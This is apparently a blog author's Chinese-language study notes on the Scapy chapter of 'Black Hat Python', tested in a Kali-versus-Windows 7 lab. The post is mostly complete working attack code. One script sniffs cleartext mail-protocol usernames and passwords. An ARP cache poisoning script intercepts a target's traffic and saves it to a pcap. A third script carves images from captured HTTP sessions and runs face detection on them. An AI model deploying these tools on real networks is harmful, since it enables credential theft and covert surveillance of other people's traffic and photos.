Python黑帽子 黑客与渗透测试编程之道（七） 第四章：Scapy:网络的掌控者

1 窃取Email认证

代码：

from scapy.all import *

def packet_callback(packet):
    if packet[TCP].payload:
        mail_packet = str(packet[TCP].payload)
        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
            print "[*] Server:%s" % packet[IP].dst
            print "[*] %s" % packet[TCP].payload

sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback,store=0)

测试：
在一个终端输入：（此处显示的user 名字是因为我先执行了下面那步，原始来说是没有的）

打开第二个终端，输入： user lebron(随便输一个名字)

然后输入：pass james(密码，用的假的所以登录不上)

2 利用Scapy进行ARP缓存投毒

准备：
攻击机：kali linux
被攻击机：windows7

需要知道被攻击机的ip地址和默认网关地址。
在Windows7机上输入ipconfig查看IP地址和默认网关地址，然后输入arp -a查看mac地址（投毒之后这个mac地址会改变）

查看Kali的Mac地址

在Kali上运行如下代码：

from scapy.all import *
import os
import sys
import threading
import signal

interface = "eth0"
target_ip = "192.168.233.132"
gateway_ip = "192.168.233.2"
packet_count = 1000

conf.iface = interface

conf.verb = 0


def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
    
    os.kill(os.getpid(), signal.SIGINT)
    

def get_mac(ip_address):
    
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    
    for s,r in responses:
        return r[Ether].src
    return None


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
    
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac
    
    print "[*] Begining the ARP poison. [CTRL-C to stop]"
    
    while True:
        try:
            send(poison_target)
            send(poison_gateway)
            
            time.sleep(2)
            
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            
    
    print "[*] ARP poison attack finished"
    return



print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
    
target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)
    

# run the arp poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))

poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count
    
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
    
    # send the data to file
    wrpcap('arper.pcap', packets)
    # reset the settings
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    
except KeyboardInterrupt:
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)
    
    

保存为arper.py

测试：
首先开启对网关和目标IP地址的流量进行转发的功能。在Kali虚拟机的终端输入：

echo 1 > /proc/sys/net/ipv4/ip_forward

然后运行以上代码：

期间Windows7要一直开机，不然会出现错误。

然后在Windows7上浏览些图片，为后面抓人像做基础。

然后查看Windows7的arp -a，会发现mac已经改成Kali上的mac地址：

试着查看输出的arper.pcap文件 （双击即可）
在Kali上默认用wireshark打开。

PS:打开时可能会遇到如下错误：
Lua: Error during loading: [string “/usr/share/wireshark/init.lua”]:46: dofile has been disabled due to running Wireshark as superuser. See http://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user.

解决：
终端运行：

nano /usr/share/wireshark/init.lua

然后会出现一个文本，找到划红线的地方，把false改成true（这里我已经改了），改完退出即可。（退出：ctrl+x,输入y,然后回车即可）

此时打开，pcap文件，可以看到：

抓到了被攻击机Windows7的活动。

3 处理PCAP文件

这一小节，是利用上面抓到的pcap文件，从中提取出浏览的图片，并把人脸标记出来。我没有成功，应该是这个pcap的问题，但是还是抓到了一个图标。。
代码如下：

import re
import zlib
import cv2

from scapy.all import *

pictures_directory = "./pictures"
faces_directory = "./faces"
pcap_file = "arper.pcap"

def face_detect(path,file_name):

        img     = cv2.imread(path)
        cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
        rects   = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

        if len(rects) == 0:
                return False
        		
        rects[:, 2:] += rects[:, :2]

	# highlight the faces in the image        
	for x1,y1,x2,y2 in rects:
		cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

	cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)

        return True

def get_http_headers(http_payload):
	
	try:
		# split the headers off if it is HTTP traffic
		headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
	
		# break out the headers
		headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
	except:
		return None
	
	if "Content-Type" not in headers:
		return None
	
	return headers

def extract_image(headers,http_payload):
	
	image      = None
	image_type = None
	
	try:
		if "image" in headers['Content-Type']:
			
			# grab the image type and image body
			image_type = headers['Content-Type'].split("/")[1]
		
			image = http_payload[http_payload.index("\r\n\r\n")+4:]
		
			# if we detect compression decompress the image
			try:
				if "Content-Encoding" in headers.keys():
					if headers['Content-Encoding'] == "gzip":
						image = zlib.decompress(image,16+zlib.MAX_WBITS)
					elif headers['Content-Encoding'] == "deflate":
						image = zlib.decompress(image)
			except:
				pass	
	except:
		return None,None
	
	return image,image_type

def http_assembler(pcap_file):

	carved_images   = 0
	faces_detected  = 0

	a = rdpcap(pcap_file)
	
	sessions      = a.sessions()	

	for session in sessions:

		http_payload = ""
		
		for packet in sessions[session]:
	
			try:
				if packet[TCP].dport == 80 or packet[TCP].sport == 80:
	
					# reassemble the stream into a single buffer
					http_payload += str(packet[TCP].payload)
	
			except:
				pass
	
		headers = get_http_headers(http_payload)
		
		if headers is None:
			continue
	
		image,image_type = extract_image(headers,http_payload)
	
		if image is not None and image_type is not None:				
		
			# store the image
			file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
			fd = open("%s/%s" % (pictures_directory,file_name),"wb")
			fd.write(image)
			fd.close()
			
			carved_images += 1
					
			# now attempt face detection
			try:
				result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)
				
				if result is True:
					faces_detected += 1
			except:
				pass
			

	return carved_images, faces_detected


carved_images, faces_detected = http_assembler(pcap_file)

print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected

./表示在home文件夹下。

然后在终端测试：
首先安装openCV：

apt-get install python-opencv python-numpy python-scipy

获取人脸检测分类算法的训练文件：

wget http://eclecti.cc/files/2008/03/haarcascade_frontalface_alt.xml

接着在终端输入：

mkdir pictures
mkdir faces

这一步我没按书上来，我是直接在Home文件夹下新建了这两个文件夹。pictures文件夹用来装抓到的图片，faces文件夹用来装识别的人脸。
运行代码：

没抓到人脸，只有一张图片，打开pictures文件夹：

这是必应的一个图标。。那么多图片它为什么会抓到这个玩意儿。。。迷。。。